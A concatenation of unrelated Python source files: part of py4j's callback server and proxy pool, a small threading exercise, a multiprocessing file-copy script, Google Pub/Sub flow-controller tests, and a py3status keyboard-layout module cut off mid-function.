set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe thread needs to be cleanup up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def get_listening_port(self):
"""Returns the port on which the callback server is listening to.
Different than `port` when port is 0.
"""
return self._listening_port
def get_listening_address(self):
"""Returns the address on which the callback server is listening to.
May be different than `address` if `address` was an alias (e.g.,
localhost).
"""
return self._listening_address
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
server_started.send(
self, server=self)
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [],
self.callback_server_parameters.accept_timeout)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
if self.callback_server_parameters.read_timeout:
socket_instance.settimeout(
self.callback_server_parameters.read_timeout)
if self.ssl_context:
socket_instance = self.ssl_context.wrap_socket(
socket_instance, server_side=True)
input = socket_instance.makefile("rb")
connection = self._create_connection(
socket_instance, input)
with self.lock:
if not self.is_shutdown:
self.connections.add(connection)
connection.start()
server_connection_started.send(
self, connection=connection)
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception as e:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
server_connection_error.send(
self, error=e)
logger.exception("Error while waiting for a connection.")
server_stopped.send(self, server=self)
def _create_connection(self, socket_instance, stream):
connection = CallbackConnection(
self.pool, stream, socket_instance, self.gateway_client,
self.callback_server_parameters, self)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
pre_server_shutdown.send(self, server=self)
with self.lock:
try:
if self.is_shutting_down:
# Do not allow calling shutdown while shutdown is
# executing. Alternative would be to not use a
# reentrant lock, but we
# would need to check all the other uses of this lock.
return
self.is_shutting_down = True
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
temp_connections = list(self.connections)
for connection in temp_connections:
connection.close()
self.pool.clear()
finally:
self.is_shutting_down = False
self.thread.join()
self.thread = None
post_server_shutdown.send(self, server=self)
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters, callback_server):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
# TODO Remove in 1.0. Take it from the callback_server directly
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# TODO Remove in 1.0. This should never be the case.
self.callback_server_parameters = CallbackServerParameters()
self.callback_server = callback_server
self.daemon = self.callback_server_parameters.daemonize_connections
def run(self):
logger.info("Callback Connection ready to receive messages")
reset = False
authenticated = self.callback_server_parameters.auth_token is None
try:
while True:
command = smart_decode(self.input.readline())[:-1]
if not authenticated:
token = self.callback_server_parameters.auth_token
# Will raise an exception if auth fails in any way.
authenticated = do_client_auth(
command, self.input, self.socket, token)
continue
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
_garbage_collect_proxy(self.pool, obj_id)
self.socket.sendall(
proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
else:
logger.error("Unknown command {0}".format(command))
# We're sending something to prevent blokincg, but at this
# point, the protocol is broken.
self.socket.sendall(
proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
except Py4JAuthenticationError:
reset = True
logger.exception("Could not authenticate connection.")
except socket.timeout:
reset = True
logger.info(
"Timeout while callback connection was waiting for"
"a message", exc_info=True)
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
self.close(reset)
def close(self, reset=False):
logger.info("Closing down callback connection")
if reset:
set_linger(self.socket)
else:
# Send shutdown before closing stream and socket
quiet_shutdown(self.socket)
quiet_close(self.input)
quiet_close(self.socket)
already_closed = self.socket is None
self.socket = None
self.input = None
if not already_closed:
server_connection_stopped.send(
self.callback_server, connection=self)
def _call_proxy(self, obj_id, input):
if obj_id not in self.pool:
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part('Object ID unknown', self.pool)
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return proto.RETURN_MESSAGE + proto.SUCCESS +\
get_command_part(return_value, self.pool)
except Exception as e:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
if self.callback_server_parameters.propagate_java_exceptions and\
isinstance(e, Py4JJavaError):
java_exception = e.java_exception
else:
java_exception = traceback.format_exc()
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part(java_exception, self.pool)
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object, force_id=None):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
if force_id:
id = force_id
else:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
atividade-01.py | import time
from datetime import datetime
import threading
def fun(id, data, status):
mensagem = " | hello, world"
dados = "ID: " + str(id) + mensagem + " | Data: " + str(data) + " | Status: " + str(status)
print(dados)
time.sleep(2)
status = "Finalizada"
data = datetime.today().strftime("%Hh%Mm%Sseg")
dados = "ID: " + str(id) + mensagem + " | Data: " + str(data) + " | Status: " + str(status)
print(dados)
x = int(input("Qual o número de threads? "))
id = 0
for i in range(x):
id = id + 1
y = threading.Thread(target=fun, args=(id, datetime.today().strftime("%Hh%Mm%Sseg"), "Iniciada"))
y.start()
|
copy_data_fast.py | """
Script to copy data fast using multiprocessing and shutil
Usage: python copy_data_fast.py <source_dir> <target_dir> <start_episode_num> <end_episode_num>
"""
import os
import sys
import numpy as np
import shutil
import time
import multiprocessing
source_dir = sys.argv[1]
target_dir = sys.argv[2]
def copy_episodes(episode):
if not os.path.isdir(os.path.join(target_dir, episode)):
os.mkdir(os.path.join(target_dir, episode))
episode_data = sorted(os.listdir(os.path.join(source_dir, episode)))
for file_name in episode_data:
if 'metadata' in file_name:
shutil.copy2(os.path.join(source_dir, episode, file_name), os.path.join(target_dir, episode, file_name))
if 'processed2' in file_name:
shutil.copy2(os.path.join(source_dir, episode, file_name), os.path.join(target_dir, episode, file_name))
if 'measurements_' in file_name:
# copy the data to other directory
episode_number = file_name.split('.')[0].split('_')[-1]
central_image = os.path.join(source_dir, episode, 'CentralRGB_%s.png'%episode_number)
left_image = os.path.join(source_dir, episode, 'LeftRGB_%s.png'%episode_number)
right_image = os.path.join(source_dir, episode, 'RightRGB_%s.png'%episode_number)
shutil.copy2(central_image, os.path.join(target_dir, episode, 'CentralRGB_%s.png'%episode_number))
shutil.copy2(left_image, os.path.join(target_dir, episode, 'LeftRGB_%s.png'%episode_number))
shutil.copy2(right_image, os.path.join(target_dir, episode, 'RightRGB_%s.png'%episode_number))
shutil.copy2(os.path.join(source_dir, episode, file_name), os.path.join(target_dir, episode, file_name))
if __name__ == '__main__':
episodes_list = sorted(os.listdir(source_dir))
jobs = []
st = time.time()
for episode in episodes_list:
if os.path.isdir(os.path.join(source_dir, episode)):
episode_number = int(episode.split('_')[-1])
if episode_number >= int(sys.argv[3]) and episode_number <= int(sys.argv[4]):
print (episode)
p = multiprocessing.Process(target=copy_episodes, args=(episode,))
jobs.append(p)
p.start()
for process in jobs:
process.join()
print ('total time taken: ', time.time()-st)
|
test_flow_controller.py | # Copyright 2020, Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import threading
import time
from typing import Callable
from typing import Sequence
from typing import Union
import warnings
import pytest
import google
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.publisher import exceptions
from google.cloud.pubsub_v1.publisher.flow_controller import FlowController
from google.pubsub_v1 import types as grpc_types
def _run_in_daemon(
action: Callable[["google.cloud.pubsub_v1.types.PubsubMessage"], None],
messages: Sequence["google.cloud.pubsub_v1.types.PubsubMessage"],
all_done_event: threading.Event,
error_event: threading.Event = None,
action_pause: Union[int, float] = None,
):
"""Run flow controller action (add or remove messages) in a daemon thread."""
def run_me():
try:
for msg in messages:
if action_pause is not None:
time.sleep(action_pause)
action(msg)
except Exception:
if error_event is not None: # pragma: NO COVER
error_event.set()
else:
all_done_event.set()
thread = threading.Thread(target=run_me)
thread.daemon = True
thread.start()
def test_no_overflow_no_error():
settings = types.PublishFlowControl(
message_limit=100,
byte_limit=10000,
limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
)
flow_controller = FlowController(settings)
# there should be no errors
for data in (b"foo", b"bar", b"baz"):
msg = grpc_types.PubsubMessage(data=data)
flow_controller.add(msg)
def test_overflow_no_error_on_ignore():
settings = types.PublishFlowControl(
message_limit=1,
byte_limit=2,
limit_exceeded_behavior=types.LimitExceededBehavior.IGNORE,
)
flow_controller = FlowController(settings)
# there should be no overflow errors
flow_controller.add(grpc_types.PubsubMessage(data=b"foo"))
flow_controller.add(grpc_types.PubsubMessage(data=b"bar"))
def test_message_count_overflow_error():
settings = types.PublishFlowControl(
message_limit=1,
byte_limit=10000,
limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
)
flow_controller = FlowController(settings)
flow_controller.add(grpc_types.PubsubMessage(data=b"foo"))
with pytest.raises(exceptions.FlowControlLimitError) as error:
flow_controller.add(grpc_types.PubsubMessage(data=b"bar"))
assert "messages: 2 / 1" in str(error.value)
def test_byte_size_overflow_error():
settings = types.PublishFlowControl(
message_limit=10000,
byte_limit=199,
limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
)
flow_controller = FlowController(settings)
# Since the message data itself occupies 100 bytes, it means that both
# messages combined will exceed the imposed byte limit of 199, but a single
# message will not (the message size overhead is way lower than data size).
msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
flow_controller.add(msg1)
with pytest.raises(exceptions.FlowControlLimitError) as error:
flow_controller.add(msg2)
total_size = msg1._pb.ByteSize() + msg2._pb.ByteSize()
expected_info = "bytes: {} / 199".format(total_size)
assert expected_info in str(error.value)
def test_no_error_on_moderate_message_flow():
settings = types.PublishFlowControl(
message_limit=2,
byte_limit=250,
limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
)
flow_controller = FlowController(settings)
msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
msg3 = grpc_types.PubsubMessage(data=b"z" * 100)
# The flow control settings will accept two in-flight messages, but not three.
# If releasing messages works correctly, the sequence below will not raise errors.
flow_controller.add(msg1)
flow_controller.add(msg2)
flow_controller.release(msg1)
flow_controller.add(msg3)
flow_controller.release(msg2)
flow_controller.release(msg3)
def test_rejected_messages_do_not_increase_total_load():
settings = types.PublishFlowControl(
message_limit=1,
byte_limit=150,
limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
)
flow_controller = FlowController(settings)
msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
flow_controller.add(msg1)
for _ in range(5):
with pytest.raises(exceptions.FlowControlLimitError):
flow_controller.add(grpc_types.PubsubMessage(data=b"z" * 100))
# After releasing a message we should again be able to add another one, despite
# previously trying to add a lot of other messages.
flow_controller.release(msg1)
flow_controller.add(msg2)
def test_incorrectly_releasing_too_many_messages():
settings = types.PublishFlowControl(
message_limit=1,
byte_limit=150,
limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
)
flow_controller = FlowController(settings)
msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
msg3 = grpc_types.PubsubMessage(data=b"z" * 100)
# Releasing a message that would make the load negative should result in a warning.
with warnings.catch_warnings(record=True) as warned:
flow_controller.release(msg1)
assert len(warned) == 1
assert issubclass(warned[0].category, RuntimeWarning)
warning_msg = str(warned[0].message)
assert "never added or already released" in warning_msg
# Incorrectly removing a message does not mess up internal stats, we can
# still only add a single message at a time to this flow.
flow_controller.add(msg2)
with pytest.raises(exceptions.FlowControlLimitError) as error:
flow_controller.add(msg3)
error_msg = str(error.value)
assert "messages: 2 / 1" in error_msg
total_size = msg2._pb.ByteSize() + msg3._pb.ByteSize()
expected_size_info = "bytes: {} / 150".format(total_size)
assert expected_size_info in error_msg
def test_blocking_on_overflow_until_free_capacity():
settings = types.PublishFlowControl(
message_limit=1,
byte_limit=150,
limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
)
flow_controller = FlowController(settings)
msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
msg3 = grpc_types.PubsubMessage(data=b"z" * 100)
msg4 = grpc_types.PubsubMessage(data=b"w" * 100)
# If there is a concurrency bug in FlowController, we do not want to block
# the main thread running the tests, thus we delegate all add/release
# operations to daemon threads and check the outcome (blocked/not blocked)
# through Events.
adding_1_done = threading.Event()
adding_2_done = threading.Event()
adding_3_done = threading.Event()
adding_4_done = threading.Event()
releasing_1_done = threading.Event()
releasing_x_done = threading.Event()
# Adding a message with free capacity should not block.
_run_in_daemon(flow_controller.add, [msg1], adding_1_done)
if not adding_1_done.wait(timeout=0.1):
pytest.fail( # pragma: NO COVER
"Adding a message with enough flow capacity blocked or errored."
)
# Adding messages when there is not enough capacity should block, even if
# added through multiple threads.
_run_in_daemon(flow_controller.add, [msg2], adding_2_done)
if adding_2_done.wait(timeout=0.1):
pytest.fail("Adding a message on overflow did not block.") # pragma: NO COVER
_run_in_daemon(flow_controller.add, [msg3], adding_3_done)
if adding_3_done.wait(timeout=0.1):
pytest.fail("Adding a message on overflow did not block.") # pragma: NO COVER
_run_in_daemon(flow_controller.add, [msg4], adding_4_done)
if adding_4_done.wait(timeout=0.1):
pytest.fail("Adding a message on overflow did not block.") # pragma: NO COVER
# After releasing one message, there should be room for a new message, which
# should result in unblocking one of the waiting threads.
_run_in_daemon(flow_controller.release, [msg1], releasing_1_done)
if not releasing_1_done.wait(timeout=0.1):
pytest.fail("Releasing a message blocked or errored.") # pragma: NO COVER
done_status = [
adding_2_done.wait(timeout=0.1),
adding_3_done.wait(timeout=0.1),
adding_4_done.wait(timeout=0.1),
]
# In sum() we use the fact that True==1 and False==0, and that Event.wait()
# returns False only if it times out, i.e. its internal flag has not been set.
done_count = sum(done_status)
assert done_count == 1, "Exactly one thread should have been unblocked."
# Release another message and verify that yet another thread gets unblocked.
added_msg = [msg2, msg3, msg4][done_status.index(True)]
_run_in_daemon(flow_controller.release, [added_msg], releasing_x_done)
if not releasing_x_done.wait(timeout=0.1):
pytest.fail("Releasing messages blocked or errored.") # pragma: NO COVER
released_count = sum(
(
adding_2_done.wait(timeout=0.1),
adding_3_done.wait(timeout=0.1),
adding_4_done.wait(timeout=0.1),
)
)
assert released_count == 2, "Exactly two threads should have been unblocked."
def test_error_if_mesage_would_block_indefinitely():
settings = types.PublishFlowControl(
message_limit=0, # simulate non-sane settings
byte_limit=1,
limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
)
flow_controller = FlowController(settings)
msg = grpc_types.PubsubMessage(data=b"xyz")
adding_done = threading.Event()
error_event = threading.Event()
_run_in_daemon(flow_controller.add, [msg], adding_done, error_event=error_event)
assert error_event.wait(timeout=0.1), "No error on adding too large a message."
# Now that we know that an error occurs, we can check its type directly
# without the fear of blocking indefinitely.
flow_controller = FlowController(settings) # we want a fresh controller
with pytest.raises(exceptions.FlowControlLimitError) as error_info:
flow_controller.add(msg)
error_msg = str(error_info.value)
assert "would block forever" in error_msg
assert "messages: 1 / 0" in error_msg
assert "bytes: {} / 1".format(msg._pb.ByteSize()) in error_msg
def test_threads_posting_large_messages_do_not_starve():
settings = types.PublishFlowControl(
message_limit=100,
byte_limit=110,
limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
)
flow_controller = FlowController(settings)
large_msg = grpc_types.PubsubMessage(data=b"x" * 100) # close to entire byte limit
adding_initial_done = threading.Event()
adding_large_done = threading.Event()
adding_busy_done = threading.Event()
releasing_busy_done = threading.Event()
releasing_large_done = threading.Event()
# Occupy some of the flow capacity, then try to add a large message. Releasing
# enough messages should eventually allow the large message to come through, even
# if more messages are added after it (those should wait for the large message).
initial_messages = [grpc_types.PubsubMessage(data=b"x" * 10)] * 5
_run_in_daemon(flow_controller.add, initial_messages, adding_initial_done)
assert adding_initial_done.wait(timeout=0.1)
_run_in_daemon(flow_controller.add, [large_msg], adding_large_done)
# Continuously keep adding more messages after the large one.
messages = [grpc_types.PubsubMessage(data=b"x" * 10)] * 10
_run_in_daemon(flow_controller.add, messages, adding_busy_done, action_pause=0.1)
# At the same time, gradually keep releasing the messages - the freeed up
# capacity should be consumed by the large message, not the other small messages
# being added after it.
_run_in_daemon(
flow_controller.release, messages, releasing_busy_done, action_pause=0.1
)
# Sanity check - releasing should have completed by now.
if not releasing_busy_done.wait(timeout=1.1):
pytest.fail("Releasing messages blocked or errored.") # pragma: NO COVER
# Enough messages released, the large message should have come through in
# the meantime.
if not adding_large_done.wait(timeout=0.1):
pytest.fail("A thread adding a large message starved.") # pragma: NO COVER
if adding_busy_done.wait(timeout=0.1):
pytest.fail("Adding multiple small messages did not block.") # pragma: NO COVER
# Releasing the large message should unblock adding the remaining "busy" messages
# that have not been added yet.
_run_in_daemon(flow_controller.release, [large_msg], releasing_large_done)
if not releasing_large_done.wait(timeout=0.1):
pytest.fail("Releasing a message blocked or errored.") # pragma: NO COVER
if not adding_busy_done.wait(timeout=1.0):
pytest.fail("Adding messages blocked or errored.") # pragma: NO COVER
def test_blocked_messages_are_accepted_in_fifo_order():
settings = types.PublishFlowControl(
message_limit=1,
byte_limit=1_000_000, # Unlimited for practical purposes in the test.
limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
)
flow_controller = FlowController(settings)
# It's OK if the message instance is shared, as flow controlelr is only concerned
# with byte sizes and counts, and not with particular message instances.
message = grpc_types.PubsubMessage(data=b"x")
adding_done_events = [threading.Event() for _ in range(10)]
releasing_done_events = [threading.Event() for _ in adding_done_events]
# Add messages. The first one will be accepted, and the rest should queue behind.
for adding_done in adding_done_events:
_run_in_daemon(flow_controller.add, [message], adding_done)
time.sleep(0.1)
if not adding_done_events[0].wait(timeout=0.1): # pragma: NO COVER
pytest.fail("The first message unexpectedly got blocked on adding.")
# For each message, check that it has indeed been added to the flow controller.
# Then release it to make room for the next message in line, and repeat the check.
enumeration = enumerate(zip(adding_done_events, releasing_done_events))
for i, (adding_done, releasing_done) in enumeration:
if not adding_done.wait(timeout=0.1): # pragma: NO COVER
pytest.fail(f"Queued message still blocked on adding (i={i}).")
_run_in_daemon(flow_controller.release, [message], releasing_done)
if not releasing_done.wait(timeout=0.1): # pragma: NO COVER
pytest.fail(f"Queued message was not released in time (i={i}).")
def test_warning_on_internal_reservation_stats_error_when_unblocking():
settings = types.PublishFlowControl(
message_limit=1,
byte_limit=150,
limit_exceeded_behavior=types.LimitExceededBehavior.BLOCK,
)
flow_controller = FlowController(settings)
msg1 = grpc_types.PubsubMessage(data=b"x" * 100)
msg2 = grpc_types.PubsubMessage(data=b"y" * 100)
# If there is a concurrency bug in FlowController, we do not want to block
# the main thread running the tests, thus we delegate all add/release
# operations to daemon threads and check the outcome (blocked/not blocked)
# through Events.
adding_1_done = threading.Event()
adding_2_done = threading.Event()
releasing_1_done = threading.Event()
# Adding a message with free capacity should not block.
_run_in_daemon(flow_controller.add, [msg1], adding_1_done)
if not adding_1_done.wait(timeout=0.1):
pytest.fail( # pragma: NO COVER
"Adding a message with enough flow capacity blocked or errored."
)
# Adding messages when there is not enough capacity should block, even if
# added through multiple threads.
_run_in_daemon(flow_controller.add, [msg2], adding_2_done)
if adding_2_done.wait(timeout=0.1):
pytest.fail("Adding a message on overflow did not block.") # pragma: NO COVER
# Intentionally corrupt internal stats
reservation = next(iter(flow_controller._waiting.values()), None)
assert reservation is not None, "No messages blocked by flow controller."
reservation.bytes_reserved = reservation.bytes_needed + 1
with warnings.catch_warnings(record=True) as warned:
_run_in_daemon(flow_controller.release, [msg1], releasing_1_done)
if not releasing_1_done.wait(timeout=0.1):
pytest.fail("Releasing a message blocked or errored.") # pragma: NO COVER
matches = [warning for warning in warned if warning.category is RuntimeWarning]
assert len(matches) == 1
assert "too many bytes reserved" in str(matches[0].message).lower()
|
xkb_input.py | r"""
Switch inputs.
Configuration parameters:
button_next: mouse button to cycle next layout (default 4)
button_prev: mouse button to cycle previous layout (default 5)
cache_timeout: refresh interval for this module; xkb-switch
and swaymsg will listen for new updates instead (default 10)
format: display format for this module (default '{format_input}')
format_input: display format for inputs
(default '[{alias}][\?soft ][\?color=s {s}[ {v}]]')
format_input_separator: show separator if more than one (default ' ')
inputs: specify a list of inputs to use in swaymsg (default [])
switcher: specify xkb-switch, xkblayout-state, xkbgroup,
or swaymsg to use, otherwise auto (default None)
thresholds: specify color thresholds to use
*(default [("fr", "lightgreen"), ("ru", "lightcoral"),
("ua", "khaki"), ("us", "lightskyblue")])*
Format placeholders:
{format_input} format for inputs
{input} number of inputs, eg 1
{switcher} eg, xkb-switch, xkblayout-state, xkbgroup, swaymsg
format_input placeholders:
xkb-switch:
xkblayout-state:
xkbgroup:
swaymsg:
{c} layout number, eg, 0
{n} layout name, eg, English (US)
{s} layout symbol, eg, us
{v} layout variant, eg, basic
{e} layout variant, {v} or {s}, eg, dvorak
{C} layout count, eg, 2
swaymsg:
{alias} custom string or {name}
{identifier} eg, 162:253 USB-HID Keyboard
{name} eg, Trackball, Keyboard, etc
{vendor} eg, 320
{product} eg, 556
{type} eg, pointer, keyboard, touchpad, etc
{xkb_layout_names} eg, English (US), French, Russian
{xkb_active_layout_index} eg, 0, 1, 2, etc
{xkb_active_layout_name} eg, English (US)
{send_events} eg, True
{accel_speed} eg, 0.0
{accel_profile} eg, adaptive
{natural_scroll} eg, adaptive
{left_handed} eg, False
{middle_emulation} eg, False
{scroll_method} eg, None
{scroll_button} eg, 274
Use `swaymsg -r -t get_inputs` to get a list of current sway inputs
and for a list of placeholders. Not all of placeholders will be usable.
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Requires:
xkb-switch: program that allows to query and change the xkb layout state
xkblayout-state: a command-line program to get/set the current keyboard layout
xkbgroup: query and change xkb layout state
swaymsg: send messages to sway window manager
Examples:
```
# sway users: for best results, add switcher to avoid false positives with `pgrep i3`
# because sway users can be using scripts, tools, et cetera with `i3` in its name.
xkb_input {
switcher = "swaymsg"
}
# sway users: specify inputs to fnmatch
xkb_input {
# display logitech identifiers
inputs = [{"identifier": "*Logitech*"}]
# display logi* keyboards only
inputs = [{"name": "Logi*", "type": "keyb*"}]
# display pointers only
inputs = [{"type": "pointer"}]
}
# sway users: display inputs, optional aliases, et cetera
xkb_input {
inputs = [
{"identifier": "1625:3192:Heng_Yu_Technology_Poker_II", "alias": "Poker 2"},
{"identifier": "0012:021:USB-HID_Keyboard", "alias": "Race 3"},
{"identifier": "0123:45678:Logitech_MX_Ergo", "alias": "MX Ergo", "type": "pointer"},
]
}
# i3 users: display inputs - see https://wiki.archlinux.org/index.php/X_keyboard_extension
# $ setxkbmap -layout "us,fr,ru" # install xkb-group to enable a listener thread
```
@author lasers, saengowp, javiertury
SAMPLE OUTPUT
{"color": "#87CEFA", "full_text": "us"}
fr
{"color": "#90EE90", "full_text": "fr"}
ru
{"color": "#F08080", "full_text": "ru"}
au
{"color": "#F0E68C", "full_text": "au"}
"""
from pathlib import Path
STRING_ERROR = "invalid command `{}`"
STRING_NOT_AVAILABLE = "no available binary"
STRING_NOT_INSTALLED = "command `{}` not installed"
class Listener:
"""
swaymsg -m - monitor for responses until killed
xkb-switch -W - infinitely waits for group change
"""
def __init__(self, parent):
self.parent = parent
if self.parent.switcher == "swaymsg":
self.listen_command = ["swaymsg", "-m", "-t", "subscribe", "['input']"]
elif self.parent.py3.check_commands("xkb-switch"):
self.listen_command = ["xkb-switch", "-W"]
else:
return
self.setup(parent)
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.process = None
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from subprocess import Popen, PIPE
try:
self.process = Popen(self.listen_command, stdout=PIPE)
while True:
self.process.stdout.readline()
code = self.process.poll()
if code is not None:
msg = "Command `{}` terminated with returncode {}"
raise Exception(msg.format(" ".join(self.listen_command), code))
self.parent.py3.update()
except Exception as err:
self.parent.error = err
self.parent.py3.update()
finally:
self.kill()
def kill(self):
try:
self.process.kill()
except AttributeError:
pass
class Xkb:
"""
"""
def __init__(self, parent):
self.parent = parent
self.post_config_setup(parent)
self.setup(parent)
def py3_command_output(self, *args):
try:
return self.parent.py3.command_output(*args)
except self.parent.py3.CommandError as err:
self.parent.error = err
raise err
def py3_command_run(self, *args):
try:
return self.parent.py3.command_run(*args)
except self.parent.py3.CommandError as err:
self.parent.error = err
raise err
def post_config_setup(self, parent):
self.name_mapping = {}
self.reverse_name_mapping = {}
self.variant_mapping = []
try:
with Path("/usr/share/X11/xkb/rules/base.lst").open() as f:
for chunk in f.read().split("\n\n"):
if "! layout" in chunk:
for line in chunk.splitlines()[1:]:
fields = line.split()
symbol, name = (fields[0], " ".join(fields[1:]))
self.name_mapping[symbol] = name
self.reverse_name_mapping[name] = (symbol, None)
if "! variant" in chunk:
for line in chunk.splitlines()[1:]:
fields = line.split()
variant, symbol, name = (
fields[0],
fields[1][:-1],
" ".join(fields[2:]),
)
self.reverse_name_mapping[name] = (symbol, variant)
self.variant_mapping.append((variant, symbol, name))
except OSError as err:
self.parent.error = err
def setup(self, parent):
pass
def add_libinput(self, _input):
pass
def set_xkb_layout(self, delta):
pass
class Xkbgroup(Xkb):
"""
xkbgroup - query and change xkb layout state
"""
def setup(self, parent):
from xkbgroup import XKeyboard
self.xo = XKeyboard
self.map = {"num": "c", "name": "n", "symbol": "s", "variant": "v"}
def get_xkb_inputs(self):
xo = self.xo()
group_data = xo.group_data._asdict()
xkb_input = {self.map[k]: v for k, v in group_data.items()}
xkb_input["e"] = xkb_input["v"] or xkb_input["s"]
xkb_input["C"] = xo.groups_count
return [xkb_input]
def set_xkb_layout(self, delta):
xo = self.xo()
xo.group_num = (xo.group_num + delta) % xo.groups_count
class Xkb_Switch(Xkb):
"""
xkb-switch - program that allows to query and change the xkb layout state
"""
def setup(self, parent):
self.init_cC = self.parent.py3.format_contains(self.parent.format_input, "[cC]")
def get_xkb_inputs(self):
s = output = self.py3_command_output("xkb-switch -p").strip()
v = None
if "(" in s and ")" in s:
v = s[s.find("(") + 1 : s.find(")")]
s = s[: s.find("(")]
for variant, symbol, name in self.variant_mapping:
if (v, s) == (variant, symbol):
n = name
break
else:
n = self.name_mapping.get(s)
xkb_input = {"s": s, "v": v, "e": v or s, "n": n}
if self.init_cC:
layouts = self.py3_command_output("xkb-switch -l").splitlines()
xkb_input["C"] = len(layouts)
for index, layout in enumerate(layouts):
if layout == output:
xkb_input["c"] = index
break
return [xkb_input]
def set_xkb_layout(self, delta):
if delta > 0:
self.py3_command_run("xkb-switch -n")
else:
